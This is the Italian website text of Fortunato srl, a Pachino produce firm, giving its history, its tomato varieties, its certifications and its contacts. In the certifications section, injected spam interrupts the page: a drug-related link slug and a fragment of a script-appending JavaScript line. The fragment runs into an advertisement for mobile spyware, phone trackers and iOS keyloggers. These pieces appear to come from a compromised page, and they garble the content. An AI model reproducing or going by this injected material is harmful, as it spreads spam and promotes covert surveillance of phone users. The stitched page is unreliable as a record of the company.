Storia

Era il 1926 quando Sebastiano Fortunato intraprese il commercio dei prodotti agricoli dell’area di Pachino: uve da vigneti destinate al taglio e legumi furono tra i primi a essere commercializzati con successo grazie alla capacità imprenditoriale di un uomo schietto e capace, ben presto affiancato dal figlio Concetto. Negli anni ’60 l’attività si trasferì nel nuovo mercato ortofrutticolo di Pachino, che già si distingueva per l’agricoltura d’eccellenza e lì fiorì, espandendosi grazie alla capacità dell’impresa familiare.
Gli anni seguenti segnarono l’espansione dell’azienda e dei suoi mercati, che si aprirono al nord Italia. Negli anni ’90 arrivò il riconoscimento dei mercati internazionali, grazie all’apporto di innovazione e valorizzazione dei prodotti su cui lavorano instancabilmente i fratelli Sebastiano e Joe Fortunato, attualmente presidente e amministratore del gruppo. Oggi la Fortunato srl è sinonimo di qualità ed eccellenza nel campo dell’ortofrutta, grazie allo straordinario paniere di prodotti garantito. Le condizioni pedoclimatiche uniche del territorio di produzione e una selezione attenta delle partite migliori connotano il gruppo Fortunato come garanzia di eccellenza dell’ortofrutta siciliana.


Azienda

Se la fedeltà alla genuinità e la tipicità delle coltivazioni restano la filosofia dell’impresa, le manovre di mercato vanno incontro alle tendenze di consumo: con lo sviluppo della Grande Distribuzione Organizzata si identifica la strategia vincente, passando dall’ottimizzazione dei servizi, attraverso un monitoraggio costante di tutte le fasi della filiera. L’innovazione, a cui il gruppo dedica parte dei propri investimenti, ha trasformato negli anni il confezionamento artigianale in packaging di serie e ha adeguato la produzione ai ritmi della domanda, grazie all’impiego di tecnologie e apparecchiature all’avanguardia. L’apertura di una seconda sede aziendale del gruppo a Santa Croce Camerina (Ragusa) ha consentito di allargare e migliorare l’offerta dei prodotti. Grazie alle proprietà straordinarie del territorio anche l’unità operativa di Santa Croce riesce a garantire uno standard alto in termini di qualità e di produzione.
Punta di diamante del gruppo Fortunato è il pomodoro di Pachino, nelle sue varietà costoluto, tondoliscio, ciliegino, datterino e Perla Nera, che rappresentano uno tra i brand dell’ortofrutta più conosciuti nel mondo. L’azienda ha ottenuto la certificazione Igp che garantisce la provenienza dell’Identità Geografica Protetta, secondo le norme comunitarie.


Certificazioni

taking-2-levitra-on…

Il Gruppo Fortunato presta particolare attenzione alla sostenibilità ambientale e al rispetto della produzione nella salvaguardia e valorizzazione di tutte le fasi della filiera di produzione come elementi fondanti di qualità.

Il Gruppo ha ottenuto la certificazioni Global G.A.P. BRC e IFS

certificazioni-fortunato

d.getElementsByTagName(‘head’)[0].appendChild(s);https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.The most popular 2017 spy software applications for the mobile phones.phone tracker, spyware iphone, ios keylogger


Contatti

Fortunato SRL
c.da Pianetti c/o MOF 96018
Pachino (SR) ITALY
tel. (+39) 0931-59.17.23
fax (+39) 0931-595675
info@fortunato-srl.it